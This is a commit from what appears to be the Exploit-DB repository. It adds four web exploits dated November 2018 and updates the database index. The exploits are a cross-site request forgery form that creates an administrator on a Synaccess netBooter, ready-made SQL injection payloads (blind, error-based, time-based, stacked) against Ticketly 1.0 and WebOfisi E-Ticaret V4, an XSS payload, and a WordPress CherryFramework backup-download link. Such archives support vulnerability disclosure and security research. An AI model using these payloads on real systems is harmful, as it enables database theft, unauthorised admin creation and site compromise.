DB: 2018-11-22

4 changes to exploits/shellcodes

macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)
Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)
Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)
Ticketly 1.0 - 'name' SQL Injection
WordPress CherryFramework Themes 3.1.4 - Backup File Download
WebOfisi E-Ticaret V4 - 'urun' SQL Injection
This commit is contained in:
Offensive Security 2018-11-22 05:01:42 +00:00
parent e3299ef341
commit 7967efda82
5 changed files with 171 additions and 1 deletions

View file

@ -0,0 +1,28 @@
# Title: Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Exploit Date: 2018-11-17
# Vendor: Synaccess Networks Inc.
# Product web page: https://www.synaccess-net.com
# Affected version: NP-0801DU (HW6.0 BL1.5 FW7.23 WF7.4)
# Tested on: Synaccess server
# CVE: N/A
# Advisory ID: ZSL-2018-5501
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5501.php
# Desc: The application interface allows users to perform certain
# actions via HTTP requests without performing any validity checks
# to verify the requests. This can be exploited to perform certai
# actions with administrative privileges if a logged-in user visits
# a malicious web site.
<html>
<body>
<form action="http://10.0.0.19:8082/adm.htm" method="POST">
<input type="hidden" name="add1" value="Nimda" />
<input type="hidden" name="add2" value="123456" />
<input type="hidden" name="add3" value="123456" />
<input type="hidden" name="adm0" value="1" />
<input type="submit" value="Gou" />
</form>
</body>
</html>

View file

@ -0,0 +1,70 @@
# Exploit Title: Ticketly 1.0 'name' SQL Injection
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-11-19
# Google Dork: N/A
# Vendor: Abisoft (https://abisoftgt.net)
# Software Link: https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql
# Affected Version: 1.0
# Patched Version: unpatched
# Category: Web Application
# Platform: Windows & Ubuntu
# Tested on: Win10x64 & Kali Linux
# 6. References:
# https://hackpuntes.com/cve-2018-18923-ticketly-1-0-multiples-sql-injections/
# CVE: N/A
# 1. Technical Description:
# Ticketly 1.0 are affected by SQL Injection in multiple parameters and
# resources through POST. This allows a attacker to read and modify
# sensitive information from the database used by the application.
# 2. Proof Of Concept (PoC):
# 2.1 The following POST request generates an error 500 in the Application (add ' in name parameter)
---
POST /ticketly/action/addproject.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/ticketly/projects.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 32
Connection: close
name=Test%22&description=Test
---
# 2.2 In another request, add two ' to receive a code 200 OK
---
POST /ticketly/action/addproject.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/ticketly/projects.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 32
Connection: close
name=Test%22%22&description=Test
---
# 3. Payloads
# 3.1 Payload (boolean-based blind)
name=Test" RLIKE (SELECT (CASE WHEN (4632=4632) THEN 0x54657374 ELSE 0x28 END)) AND "lrmZ"="lrmZ&description=Test
# 3.2 Payload (error-based)
name=Test” AND EXTRACTVALUE(9139,CONCAT(0x5c,0x7176766a71,(SELECT (ELT(9139=9139,1))),0x7178717a71)) AND "SZJL"="SZJL&description=Test
#3.3 Payload (AND/OR time-based blind)
name=Test” RLIKE SLEEP(5) AND "WkTS"="WkTS&description=Test
# 4. Vulnerables resources and parameters
# /action/addproject.php (description, name, category_id and description)
# /action/addticket.php (king_id, priority_id, project_id, status_id and title)
# /reports.php (kind_id y status_id)

View file

@ -0,0 +1,24 @@
# Exploit Title: Wordpress CherryFramework Themes 3.1.4 - Backup File Download
# Google Dork: inurl:/wp-content/themes/CherryFramework
# Date: 2018-11-17
# Exploit Author: b1p0l4r
# Vendor Homepage: http://www.cherryframework.com/
# Software Link: http://www.cherryframework.com/
# Version: 3.x.x > 3.1.4
# Tested on: Ubuntu 18.0.4.1
# CVE : N/A
# The CherryFramework Cherry theme 3.1.4 for WordPress allow
# remote attackers to
# obtain potentially sensitive information via
# wp-content/themes/CherryFramework/admin/data_management/ download_backup.php
# because it
# offers the option of a ZIP archive containing the entire content of the wp-content/themes directory.
# [PoC]
# just open that files/link and then showing the popup for saving a .ZIP file
# EXAMPLE LINK =
https://www.victim.com/wp-content/themes/CherryFramework/admin/data_management/download_backup.php
# IndoXploit, ZeroByte.ID, Eldersc0de Family, Exploiter Xero Team

View file

@ -0,0 +1,44 @@
# Exploit Title: WebOfisi E-Ticaret V4 - 'urun' SQL Injection
# Date: 2018-11-21
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://www.web-ofisi.com
# Software Demo: http://demobul.net/eticaretv4/
# Software Link: https://drive.google.com/file/d/1ZghFSsYto-Vpv3PXunx8xm2g-Gs3HJwz/view?usp=sharing
# Version: v4.0
# Category: Webapps
# Tested on: XAMPP for Linux
# Description: E-Ticaret v4 is a professional online shopping script with many features.
# Vulnerabilities have been discovered during penetration testing.
# PoC : SQLi :
# Request : /eticaretv4/arama.html?kategori=20&urun=test
# Parameter : urun (GET)
# Type : boolean-based blind
# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
# Payload:
kategori=20&urun=test") RLIKE (SELECT (CASE WHEN (6525=6525)THEN 0x74656474 ELSE 0x28 END)) AND ("YWLa"="YWLa
# Type: error-based
# Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload:
kategori=20&urun=test") OR (SELECT 6556 FROM(SELECT COUNT(*),CONCAT(0x71626b6b71,(SELECT(ELT(6556=6556,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("ExaV"="ExaV
# Type: stacked queries
# Title: MySQL < 5.0.12 stacked queries (heavy query)
# Payload:
kategori=20&urun=test");SELECT BENCHMARK(5000000,MD5(0x44527964)) AND ("KGaO"="KGaO
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 OR time-based blind
# Payload:
kategori=20&urun=test") OR SLEEP(5) AND ("sDnb"="sDnb
# PoC : XSS :
# Payload :
http://demobul.net/eticaretv4/arama.html?kategori=20&urun=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E

View file

@ -6194,7 +6194,7 @@ id,file,description,date,author,type,platform,port
45885,exploits/windows_x86-64/dos/45885.txt,"Easy Outlook Express Recovery 2.0 - Denial of Service (PoC)",2018-11-16,"Ihsan Sencan",dos,windows_x86-64,
45887,exploits/windows/dos/45887.py,"XMPlay 3.8.3 - '.m3u' Denial of Service (PoC)",2018-11-19,s7acktrac3,dos,windows,
45889,exploits/windows/dos/45889.js,"Microsoft Edge Chakra - OP_Memset Type Confusion",2018-11-19,"Google Security Research",dos,windows,
45891,exploits/macos/dos/45891.c,"macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)",2018-11-20,"Fabiano Anemone",dos,macos,
45891,exploits/macos/dos/45891.c,"Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)",2018-11-20,"Fabiano Anemone",dos,macos,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -40396,3 +40396,7 @@ id,file,description,date,author,type,platform,port
45882,exploits/php/webapps/45882.txt,"Helpdezk 1.1.1 - Arbitrary File Upload",2018-11-16,"Ihsan Sencan",webapps,php,80
45883,exploits/php/webapps/45883.txt,"DomainMOD 4.11.01 - Cross-Site Scripting",2018-11-16,"Dawood Ansar",webapps,php,80
45892,exploits/php/webapps/45892.txt,"Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)",2018-11-20,"Javier Olmedo",webapps,php,80
45894,exploits/hardware/webapps/45894.txt,"Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)",2018-11-21,LiquidWorm,webapps,hardware,
45895,exploits/php/webapps/45895.txt,"Ticketly 1.0 - 'name' SQL Injection",2018-11-21,"Javier Olmedo",webapps,php,80
45896,exploits/php/webapps/45896.txt,"WordPress CherryFramework Themes 3.1.4 - Backup File Download",2018-11-21,b1p0l4r,webapps,php,80
45897,exploits/php/webapps/45897.txt,"WebOfisi E-Ticaret V4 - 'urun' SQL Injection",2018-11-21,AkkuS,webapps,php,80

Can't render this file because it is too large.